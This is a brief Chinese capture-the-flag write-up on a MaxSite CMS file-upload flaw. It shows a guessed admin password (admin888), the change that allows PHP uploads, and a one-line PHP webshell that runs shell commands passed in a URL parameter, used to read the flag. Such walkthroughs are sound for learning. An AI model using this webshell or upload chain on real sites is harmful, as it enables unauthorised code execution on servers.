目录
一、题目
二、官方POC
一、题目
介绍:
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。
进入题目:
发现是俄文 乌拉~~
不过没关系 我们国产化一下:
二、官方POC
国家信息安全漏洞库
登录目录是/admin/options
一开始以为弱口令就是admin:admin
然而不对:
尝试了几个密码password admin123 666 888什么的
结果还被试出来了:admin888
先修改可上传文件类型
添加php
进入下载页面:
点击上传页面:
上传木马文件:
<?php system($_GET[1]);phpinfo();?>
点击下载
点击已上传的文件
查看 xxx.php?1=cat /flag
flag{90aeafa9-7baf-413d-ba1d-7817411d86f0}